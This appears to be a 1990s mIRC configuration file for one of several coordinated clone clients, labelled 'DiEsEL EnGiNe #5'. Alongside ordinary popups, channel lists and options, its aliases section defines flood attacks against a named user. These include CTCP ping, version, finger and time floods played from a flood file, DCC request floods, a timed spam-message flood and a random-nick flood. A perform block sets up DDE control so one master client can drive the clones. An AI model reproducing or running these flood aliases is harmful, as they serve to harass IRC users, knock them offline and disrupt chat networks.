[Windows]
main=53,533,60,360,2,0,0
wquery=22,320,22,189,0
wchannel=19,621,22,309,0,1,0
wchat=426,213,0,100,0
wdccsg=26,530,26,276,0
wlist=0,640,175,175,1

[mPopup]
mp0=Server
mp1=.Lusers:/lusers
mp2=.Motd:/motd
mp3=.Time:/time
mp4=Names
mp5=.#mIRC:/names #mirc
mp6=.#irchelp: /names #irchelp
mp7=.#friendly: /names #friendly
mp8=.names ?:/names #$$?="Enter a channel name:"
mp9=Join
mp10=.#mIRC:/join #mirc
mp11=.#irchelp:/join #irchelp
mp12=.#friendly:/join #friendly
mp13=.join ?:/join #$$?="Enter a channel to join:"
mp14=Channel
mp15=.Try double-clicking in a channel window!:
mp16=Other
mp17=.Whois ?:/whois $$?="Enter a nickname:"
mp18=.Query:/query $$?="Enter a nickname:"
mp19=.Nickname:/nick $$?="Enter your new nickname:"
mp20=.Away
mp21=..Set Away...:/away $$?="Enter your away message:"
mp22=..Set Back:/away
mp23=.List Channels:/list
mp24=Finger
mp25=.xhlec@wmin.ac.uk:/finger xhlec@wmin.ac.uk
mp26=.Address?:/finger $$?="Enter an address to finger:"
mp27=Edit Notes:/run notepad.exe notes.txt
mp28=Quit IRC:/quit Leaving!
mp29=&Random Quit Message:/quit $read c:\mirc\quit.txt

[qPopup]
qp0=UCentral:/uwho $$1
qp1=Whois:/whois $$1
qp2=CTCP
qp3=.Ping:/ctcp $$1 ping
qp4=.Finger:/ctcp $$1 finger
qp5=.Version:/ctcp $$1 version
qp6=.Time:/ctcp $$1 time
qp7=.Userinfo:/ctcp $$1 userinfo
qp8=.ClientInfo:/ctcp $$1 clientinfo
qp9=DCC
qp10=.Send:/dcc send $$1

[lPopup]
lp0=Whois:/whois $$1
lp1=Query:/query $$1
lp2=UCentral:/uwho $1
lp3=-
lp4=Control
lp5=.Give Ops:/mode # +ooo $$1 $2 $3
lp6=.Deop:/mode # -ooo $$1 $2 $3
lp7=.Kick:/kick # $$1
lp8=.Ban:/ban $$1 2
lp9=.Kick, Ban:/ban $$1 2 | /kick # $$1
lp10=CTCP
lp11=.Ping:/ctcp $$1 ping
lp12=.Finger:/ctcp $$1 finger
lp13=.Version:/ctcp $$1 version
lp14=.Time:/ctcp $$1 time
lp15=.Userinfo:/ctcp $$1 userinfo
lp16=.ClientInfo:/ctcp $$1 clientinfo
lp17=DCC
lp18=.Send:/dcc send $$1
lp19=.Chat:/dcc chat $$1
lp20=-
lp21=Slap!:/me slaps $$1 around a bit with a large trout

[DDE]
ServerStatus=on
ServiceName=engine5

[About]
show=oryx

[Channels]
ch0=#friendly
ch1=#ircbar
ch2=#irchelp
ch3=#ircnewbies
ch4=#mIRC
ch5=#new2irc
ch6=#newbies
ch7=#wasteland
ch8=#winsock
ch9=#www

[Clicks]
status=/lusers
query=/whois $$1
channel=/channel
nicklist=/query $$1

[Dragdrop]
n0=*.wav:/sound $1 $2
n1=*.*:/dcc send $1 $2
s2=*.*:/dcc send $1 $2

[Perform]
n0=/ddeserver on engine5
n1=/dde mirc command "" /echo 4 DiEsEL EnGiNe #5 Is ReAdY FoR AcTiOn On  $+ $server $+ 
n3=/ignore *!*@*

[Extensions]
n0=defaultEXTDIR:$mircdirclones

[Aliases]
n7=/pflood /play -ctPING $$1 $mircdir\clones\flood.ini
n16=/vflood /play -ctVERSION $$1 $mircdir\clones\flood.ini
n10=/fflood /play -ctFINGER $$1 $mircdir\clones\flood.ini
n13=/tflood /play -ctTIME $$1 $mircdir\clones\flood.ini
n0=/cflood /play -ctCLIENTINFO $$1 $mircdir\clones\flood.ini
n1=/uflood /play -ctUSERINFO $$1 $mircdir\clones\flood.ini
n11=/rflood /play -ctTROUT $$1 $mircdir\clones\flood.ini
n12=/hflood /play -ctHALIBUT $$1 $mircdir\clones\flood.ini
n3=/dresume /play -ctRESUME $$1 $mircdir\clones\flood.ini
n4=/daccept /play -ctACCEPT $$1 $mircdir\clones\flood.ini
n5=/dchat /play -ctDCC_CHAT $$1 $mircdir\clones\flood.ini
n6=/dsend /play -ctDCC_SEND $$1 $mircdir\clones\flood.ini
n8=/eflood /play -ctECHO $$1 $mircdir\clones\flood.ini
n20=/replyf /play -ctREPLY $$1 $mircdir\clones\flood.ini
n24=/msgflood /timer 8 2 /msg $$1 .x(-DiEsEL-)x.%ReViTuP%.x(-DiEsEL-)x.%ReViTuP%.x(-DiEsEL-)x.%ReViTuP%.x(-DiEsEL-)x.%ReViTuP%.x(-DiEsEL-)x.%ReViTuP%.x(-DiEsEL-)x.%ReViTuP%.x(-DiEsEL-)x.%ReViTuP%.x(-DiEsEL-)x.%ReViTuP%.x(-DiEsEL-)x.%ReViTuP%.x(-DiEsEL-)x.%ReViTuP%.x(-DiEsEL-)x.%ReViTuP%.x(-DiEsEL-)x.
n22=/nc /nick $r(a,z) $+ $r(0,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(0,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(0,9) $+ $r(A,Z)
n23=/nflood /timer 15 2 /nc

[Ident]
active=no
userid=tank
system=UNIX
port=113

[Socks]
Enabled=no
Port=1080

[Local]
local=
localip=
longip=

[Options]
n0=1,1,0,0,0,0,0,1,0,1,1,1,0,0,1,1,1,1,1,1,512,0,0,1,0,0
n1=5,50,0,0,0,0,0,0,1,1,1,1,0,0,1,1,1,1,0,0,0,1
n2=0,0,1,0,0,1,1,1,0,60,120,0,0,1,0,0,0,0,0,120,20,10
n3=500,0,0,0,1,0,1,1,1,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,1,1,0,8,0
n4=800,0,0,1,0,1,999,0,0,0,0,0,0,0,0,1,10,0,0,0,0,0
n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,1,1,1,0,300,20,4,0,1,21,0

[Text]
aptitle=.x(-DiEsEL EnGiNe-)x. NuMbEr 5
commandchar=/
linesep=-
quit=-.x(-ExCeSS FLooD-)x.

[Files]
servers=$mircdirclones\tank5.ini
aliases=$mircdirclones\tank5.ini
popups=$mircdirclones\tank5.ini
users=$mircdirclones\tank5.ini
variables=$mircdirclones\tank5.ini
commands=$mircdirclones\tank5.ini
events=$mircdirclones\tank5.ini
raw=$mircdirclones\tank5.ini
browser=c:\program files\netscape\navigator\program\netscape.exe
finger=$mircdirfinger.txt
urls=$mircdirurl.ini

[mIRC]
user=.x(-DiEsEL EnGiNe-)x. NuMbEr 5
email=tank
nick=asdafgdfg
anick=jsdfsdf
host=UNDERNET: SaltLake.UT.US.UnderNET.OrgSERVER:SaltLake.UT.US.UnderNET.Org:6667

[Dirs]
senddir=$mircdirget
logdir=$mircdirget
waves=$mircdirget

[Ignore]
n0=*!*@*

